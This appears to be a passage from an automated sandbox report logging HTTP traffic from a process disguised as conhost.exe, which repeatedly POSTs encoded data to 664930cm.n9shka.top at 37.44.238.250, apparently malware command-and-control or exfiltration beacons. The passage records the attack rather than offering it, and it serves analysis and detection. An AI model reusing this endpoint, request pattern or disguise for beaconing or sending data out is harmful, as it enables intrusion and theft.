                                                          Oct 1, 2024 05:58:18.340296984 CEST1120OUTData Raw: 5d 55 5f 5d 5c 42 54 50 5c 58 57 5a 54 5d 55 5d 59 51 59 57 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]U_]\BTP\XWZT]U]YQYWPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9 ?V6]<=)Z'6Y$;7Y/#+T%=$&W&21?#<9!F/'P,1
                                                          Oct 1, 2024 05:58:18.621289015 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:18.753087997 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.64976437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:18.034775019 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:18.387531042 CEST1840OUTData Raw: 58 53 5a 59 59 49 54 55 5c 58 57 5a 54 5d 55 51 59 55 59 56 50 5e 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XSZYYITU\XWZT]UQYUYVP^VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:U7W!+(])[3.2&3X/ ?$R2W!%>?2 ?)!F/'P,1
                                                          Oct 1, 2024 05:58:18.662667036 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.64976537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:18.948857069 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:19.293462038 CEST1120OUTData Raw: 58 55 5f 5b 5c 42 54 53 5c 58 57 5a 54 5a 55 59 59 51 59 59 50 5c 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_[\BTS\XWZTZUYYQYYP\VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-0/T!]4?2'&;</U',Q2P&:\(2??9!F/'P,-
                                                          Oct 1, 2024 05:58:19.556365967 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:19.687680006 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.64976637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:19.966725111 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:20.324604034 CEST1120OUTData Raw: 58 57 5f 59 59 48 51 54 5c 58 57 5a 54 5d 55 5b 59 54 59 5e 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW_YYHQT\XWZT]U[YTY^P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-'T"4^>:'X"%;X/0;'><R&W=%B.[<!8T+!F/'P,1
                                                          Oct 1, 2024 05:58:20.581358910 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:20.709384918 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.64976737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:20.841829062 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:21.199671984 CEST1120OUTData Raw: 58 52 5f 59 59 46 51 54 5c 58 57 5a 54 53 55 50 59 51 59 56 50 5a 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XR_YYFQT\XWZTSUPYQYVPZVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]97V!+<*!9&=6[&;+-#/T';$!&U%'.[?<9!F/'P,
                                                          Oct 1, 2024 05:58:21.451883078 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:21.581860065 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.64976837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:21.701327085 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:22.058988094 CEST1112OUTData Raw: 58 56 5a 5b 5c 42 51 56 5c 58 57 5a 54 5b 55 5f 59 53 59 5a 50 59 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XVZ[\BQV\XWZT[U_YSYZPYVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9'R (8=T%^'&8'X8 '.(W21>$7%>"(U(9!F/'P,1
                                                          Oct 1, 2024 05:58:22.327554941 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:22.461812019 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.64976937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:22.590749025 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:22.949644089 CEST1112OUTData Raw: 5d 52 5a 5c 59 41 54 54 5c 58 57 5a 54 5b 55 5a 59 50 59 5e 50 5f 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]RZ\YATT\XWZT[UZYPY^P_VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.#<68')1*0*1(;;%.;%V1!+" (!F/'P,%
                                                          Oct 1, 2024 05:58:23.225852013 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:23.358979940 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.64977037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:23.482027054 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.64977137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:23.887305021 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:24.246484995 CEST1840OUTData Raw: 5d 52 5a 5c 59 48 54 5f 5c 58 57 5a 54 5d 55 5d 59 57 59 5a 50 5c 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]RZ\YHT_\XWZT]U]YWYZP\VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U "8<=19_'>$+;80$0<%12B!??!F/'P,1
                                                          Oct 1, 2024 05:58:24.509949923 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:24.640865088 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 58 25 24 03 0b 21 3c 36 02 29 3f 24 05 30 37 3c 03 3a 13 30 08 26 59 3f 5e 2e 32 2d 05 2b 5f 2d 03 25 2e 34 00 32 0b 39 0b 33 0c 20 5f 0d 10 21 01 21 28 36 50 2f 17 28 05 3e 0f 30 41 32 33 2f 1f 24 0d 0f 0f 3f 00 24 1f 27 02 29 1e 27 3f 25 0f 2f 26 28 13 2b 34 2c 11 21 2b 2d 56 02 1e 22 50 25 5e 3d 55 23 3c 35 5c 30 2b 27 07 21 28 31 55 3e 2e 0e 5d 27 24 0c 17 29 13 38 01 2b 2c 3c 07 22 2a 03 5d 20 31 21 52 27 19 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %X%$!<6)?$07<:0&Y?^.2-+_-%.4293 _!!(6P/(>0A23/$?$')'?%/&(+4,!+-V"P%^=U#<5\0+'!(1U>.]'$)8+,<"*] 1!R''\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.64977237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:24.105957031 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:24.465333939 CEST1120OUTData Raw: 5d 57 5f 5e 59 47 54 50 5c 58 57 5a 54 5d 55 5b 59 5b 59 5e 50 5b 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]W_^YGTP\XWZT]U[Y[Y^P[VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9+S!<^*"0)&$;0?'+2W22.[<2+(!F/'P,1
                                                          Oct 1, 2024 05:58:24.711977959 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:24.841279984 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.64977337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:24.967103958 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:25.324632883 CEST1120OUTData Raw: 58 55 5f 5f 5c 44 51 51 5c 58 57 5a 54 52 55 50 59 5b 59 5f 50 59 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU__\DQQ\XWZTRUPY[Y_PYVE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":U/W5+4]*2)Z$.[18'- +U'=8W11"U&B9?";(9!F/'P,
                                                          Oct 1, 2024 05:58:25.582802057 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:25.719170094 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.64977437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:25.851136923 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:26.200103045 CEST1120OUTData Raw: 58 51 5a 5c 59 44 54 51 5c 58 57 5a 54 5a 55 5b 59 51 59 5f 50 50 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ\YDTQ\XWZTZU[YQY_PPVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y97U"?>23=)$(78 <0>8V1!!$$)?!<?!F/'P,-
                                                          Oct 1, 2024 05:58:26.467844963 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:26.599069118 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.64977537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:26.741493940 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:27.090369940 CEST1120OUTData Raw: 58 50 5a 5b 59 48 54 53 5c 58 57 5a 54 58 55 5e 59 51 59 5b 50 5f 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZ[YHTS\XWZTXU^YQY[P_VD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.3U5(+="%]$=%^#^-0?R0.41"12(+*9!F/'P,%
                                                          Oct 1, 2024 05:58:27.385956049 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:27.518934011 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.64977637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:27.644674063 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:28.013705969 CEST1120OUTData Raw: 58 50 5a 58 59 49 54 54 5c 58 57 5a 54 52 55 5a 59 56 59 58 50 50 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZXYITT\XWZTRUZYVYXPPVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"- "<]>%_0>18X-3 3= Q1!P%4"(#?)!F/'P,
                                                          Oct 1, 2024 05:58:28.307374001 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:28.476569891 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.64977737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:28.608047962 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:28.994798899 CEST1120OUTData Raw: 58 51 5f 54 5c 44 51 53 5c 58 57 5a 54 5c 55 5a 59 50 59 5b 50 58 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
